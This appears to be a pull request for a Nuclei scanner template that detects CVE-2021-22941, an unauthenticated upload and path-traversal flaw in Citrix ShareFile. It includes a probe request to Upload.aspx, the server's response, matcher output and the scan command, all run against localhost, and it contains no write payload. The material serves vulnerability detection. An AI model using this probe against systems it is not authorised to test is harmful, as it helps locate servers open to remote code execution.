/claim #14092
Broken access control allows unauthenticated attackers to access Upload.aspx endpoint. Combined with path traversal in uploadid parameter, enables arbitrary file write leading to RCE.
✅ Tests 3 vulnerable endpoint paths for maximum coverage
✅ Validates IIS/ASP.NET headers and response patterns
✅ Extracts LocalFile GUID for confirmation
✅ Comprehensive false positive prevention
Exploited by PROPHET SPIDER in early 2022 to deploy webshells and gain RCE access.
# Template successfully tested and validated - All 3 endpoint paths tested
# === PATH 1: /ShareFile/StorageCenter/Upload.aspx ===
GET /ShareFile/StorageCenter/Upload.aspx?uploadid=36HS4QZDqJbp9kPQ1jghwcXmKwg&bp=1&multipart=false HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
HTTP/1.0 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Aspnet-Version: 4.0.30319
Content-Type: text/plain
LocalFile: 796c4a37-7321-429d-90af-183d5f3f4486
Chunk: 0
Finished: True
UploadId: 36HS4QZDqJbp9kPQ1jghwcXmKwg
# === PATH 2: /StorageCenter/Upload.aspx ===
✅ LocalFile extracted: d0ba6081-a71a-4688-b844-a2e0a894b528
✅ All IIS/ASP.NET headers validated
# === PATH 3: /upload.aspx ===
✅ LocalFile extracted: 46dea3d5-ed70-4892-9535-59dbc7db9c3c
✅ All IIS/ASP.NET headers validated
# === MATCHER VALIDATION ===
[CVE-2021-22941:localfile-check] ✅ LocalFile pattern matched
[CVE-2021-22941:metadata-check] ✅ Chunk/Finished/UploadId matched
[CVE-2021-22941:success-status] ✅ Status 200 matched
[CVE-2021-22941:server-headers] ✅ ASP.NET/IIS headers matched
[CVE-2021-22941:localfile-guid] ✅ GUID extracted: 796c4a37-7321-429d-90af-183d5f3f4486
# Scan completed in 10.104542ms. 4 matches found.
nuclei -t http/cves/2021/CVE-2021-22941.yaml -u http://localhost:8888 -debug
Fixes #14092
Green Hacker
@GreenHacker420
ProjectDiscovery
@projectdiscovery